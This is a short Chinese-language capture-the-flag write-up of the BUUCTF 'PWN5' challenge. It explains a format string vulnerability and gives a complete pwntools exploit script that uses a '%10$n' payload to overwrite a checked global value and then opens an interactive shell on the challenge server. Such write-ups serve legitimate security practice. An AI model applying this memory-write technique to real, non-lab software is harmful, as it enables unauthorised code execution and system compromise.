(Buuctf) [第五空间2019 决赛]PWN5 简单格式化字符串漏洞利用

在这里插入图片描述这题是个基本格式化字符串漏洞利用;

满足if条件即可得到答案;

使 nptr 与 dword_804C044 相等即可;

可以使我们利用的是 第一次的输入输出;

addr=0x804C044
payload=p32(addr)+'%10$n'

先得出偏移量:
在这里插入图片描述

from pwn import *
p=remote('node3.buuoj.cn',26937)
addr=0x804C044
payload=p32(addr)+'%10$n'
p.sendline(payload)
p.sendline('4')
p.interactive()

有问题欢迎留言 ❄

猜你喜欢

转载自blog.csdn.net/weixin_45556441/article/details/115219330